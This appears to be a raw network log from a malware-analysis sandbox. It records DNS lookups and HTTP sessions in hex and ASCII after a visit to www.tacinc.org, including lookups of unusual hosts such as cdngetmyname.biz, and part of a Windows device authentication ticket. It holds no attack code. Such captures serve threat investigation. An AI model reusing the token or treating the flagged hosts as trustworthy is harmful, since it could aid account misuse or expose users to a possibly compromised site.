                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.815452099 CEST1.1.1.1192.168.2.60xf7c4No error (0)p.typekit.netp.typekit.net-stls-v3.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.817694902 CEST1.1.1.1192.168.2.60xe2a4No error (0)p.typekit.netp.typekit.net-stls-v3.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.357702971 CEST1.1.1.1192.168.2.60x9645No error (0)www.tacinc.org141.193.213.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.357702971 CEST1.1.1.1192.168.2.60x9645No error (0)www.tacinc.org141.193.213.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.345448017 CEST1.1.1.1192.168.2.60xde75No error (0)cdngetmyname.biz91.212.166.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.956265926 CEST1.1.1.1192.168.2.60xaed6No error (0)stats.wpmucdn.comwpmu-stats.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.957775116 CEST1.1.1.1192.168.2.60x88adNo error (0)stats.wpmucdn.comwpmu-stats.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.957775116 CEST1.1.1.1192.168.2.60x88adNo error (0)wpmu-stats.b-cdn.net169.150.247.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.674650908 CEST1.1.1.1192.168.2.60x368fNo error (0)pluralism.themancav.com207.148.0.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.692465067 CEST1.1.1.1192.168.2.60x32b2No error (0)cdngetmyname.biz91.212.166.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.903773069 CEST1.1.1.1192.168.2.60x8edbNo error (0)stats1.wpmudev.commatomo-wpmudev-1288779782.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.916933060 CEST1.1.1.1192.168.2.60xa515No error (0)stats1.wpmudev.commatomo-wpmudev-1288779782.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.916933060 CEST1.1.1.1192.168.2.60xa515No error (0)matomo-wpmudev-1288779782.us-east-2.elb.amazonaws.com18.191.25.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.916933060 CEST1.1.1.1192.168.2.60xa515No error (0)matomo-wpmudev-1288779782.us-east-2.elb.amazonaws.com18.119.80.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:08.623718023 CEST1.1.1.1192.168.2.60xddb5No error (0)stats.wpmucdn.comwpmu-stats.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:08.626315117 CEST1.1.1.1192.168.2.60xe73dNo error (0)stats.wpmucdn.comwpmu-stats.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:08.626315117 CEST1.1.1.1192.168.2.60xe73dNo error (0)wpmu-stats.b-cdn.net169.150.247.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.660521030 CEST1.1.1.1192.168.2.60x4658No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.660521030 CEST1.1.1.1192.168.2.60x4658No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.345931053 CEST1.1.1.1192.168.2.60xdf45No error (0)pixel.wp.com192.0.76.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.757744074 CEST1.1.1.1192.168.2.60x37aNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.757744074 CEST1.1.1.1192.168.2.60x37aNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.135915995 CEST1.1.1.1192.168.2.60x2ef7No error (0)pixel.wp.com192.0.76.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:49.269623995 CEST1.1.1.1192.168.2.60x1c61No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:49.269623995 CEST1.1.1.1192.168.2.60x1c61No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:04:49.269623995 CEST1.1.1.1192.168.2.60x1c61No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:05:09.594784021 CEST1.1.1.1192.168.2.60xbcb6No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 23, 2024 20:05:09.594784021 CEST1.1.1.1192.168.2.60xbcb6No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              0192.168.2.649717141.193.213.11801424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              Oct 23, 2024 20:03:58.411771059 CEST429OUTGET / HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Oct 23, 2024 20:03:59.136096954 CEST462INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:03:59 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              Location: https://www.tacinc.org/
                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a59d79666b2c-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                                              Oct 23, 2024 20:04:44.145103931 CEST6OUTData Raw: 00
                                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              0192.168.2.64971040.113.103.199443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:03:55 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 54 2b 42 30 49 5a 35 39 53 6b 36 46 54 71 72 7a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 32 34 66 66 35 64 32 62 37 66 63 32 66 39 64 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: T+B0IZ59Sk6FTqrz.1Context: 324ff5d2b7fc2f9d
                                                                                                                                                                                                                              2024-10-23 18:03:55 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                              2024-10-23 18:03:55 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 54 2b 42 30 49 5a 35 39 53 6b 36 46 54 71 72 7a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 32 34 66 66 35 64 32 62 37 66 63 32 66 39 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 63 4f 73 36 63 53 6b 65 30 55 48 52 73 55 68 77 41 50 46 62 57 6e 61 64 46 4d 56 41 6d 6e 64 57 46 68 48 46 63 6b 38 37 4b 44 72 6c 39 58 47 7a 55 51 51 6b 46 59 6b 47 2f 4e 6b 31 79 48 4d 34 72 67 44 57 51 31 6a 50 57 43 4f 41 59 63 72 71 7a 57 6c 52 54 56 5a 49 75 39 37 49 72 31 61 6c 45 46 6c 2f 6d 6e 58 69 67 38 57 55 66
                                                                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: T+B0IZ59Sk6FTqrz.2Context: 324ff5d2b7fc2f9d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAcOs6cSke0UHRsUhwAPFbWnadFMVAmndWFhHFck87KDrl9XGzUQQkFYkG/Nk1yHM4rgDWQ1jPWCOAYcrqzWlRTVZIu97Ir1alEFl/mnXig8WUf
                                                                                                                                                                                                                              2024-10-23 18:03:55 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 54 2b 42 30 49 5a 35 39 53 6b 36 46 54 71 72 7a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 32 34 66 66 35 64 32 62 37 66 63 32 66 39 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: T+B0IZ59Sk6FTqrz.3Context: 324ff5d2b7fc2f9d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                              2024-10-23 18:03:56 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                              2024-10-23 18:03:56 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6d 66 4d 30 4b 56 49 51 36 45 4b 43 2f 52 6a 74 74 44 35 4e 35 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                              Data Ascii: MS-CV: mfM0KVIQ6EKC/RjttD5N5A.0Payload parsing failed.


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              1192.168.2.64971613.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:03:58 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:03:58 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:03:58 GMT
                                                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                                                              Content-Length: 218853
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Cache-Control: public
                                                                                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 13:21:21 GMT
                                                                                                                                                                                                                              ETag: "0x8DCF1D34132B902"
                                                                                                                                                                                                                              x-ms-request-id: 84bcd95b-b01e-001e-1a38-240214000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180358Z-r1755647c66z4pt7cv1pnqayy400000008p0000000002y8a
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:03:58 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                              Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                              2024-10-23 18:03:58 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                                                                                                                                                                                                                              Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                                                                                                                                                                                                                              2024-10-23 18:03:58 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                                                                                                                                                                                                                              Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                                                                                                                                                                                                                              2024-10-23 18:03:58 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                                                                                                                                                                              Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                                                                                                                                                                                                                              2024-10-23 18:03:58 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                                                                                                                                                                                                                              Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
                                                                                                                                                                                                                              2024-10-23 18:03:59 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
                                                                                                                                                                                                                              2024-10-23 18:03:59 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                                                                                                                                                                                                                              Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                                                                                                                                                                                                                              2024-10-23 18:03:59 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                                                                                                                                                                                                                              Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
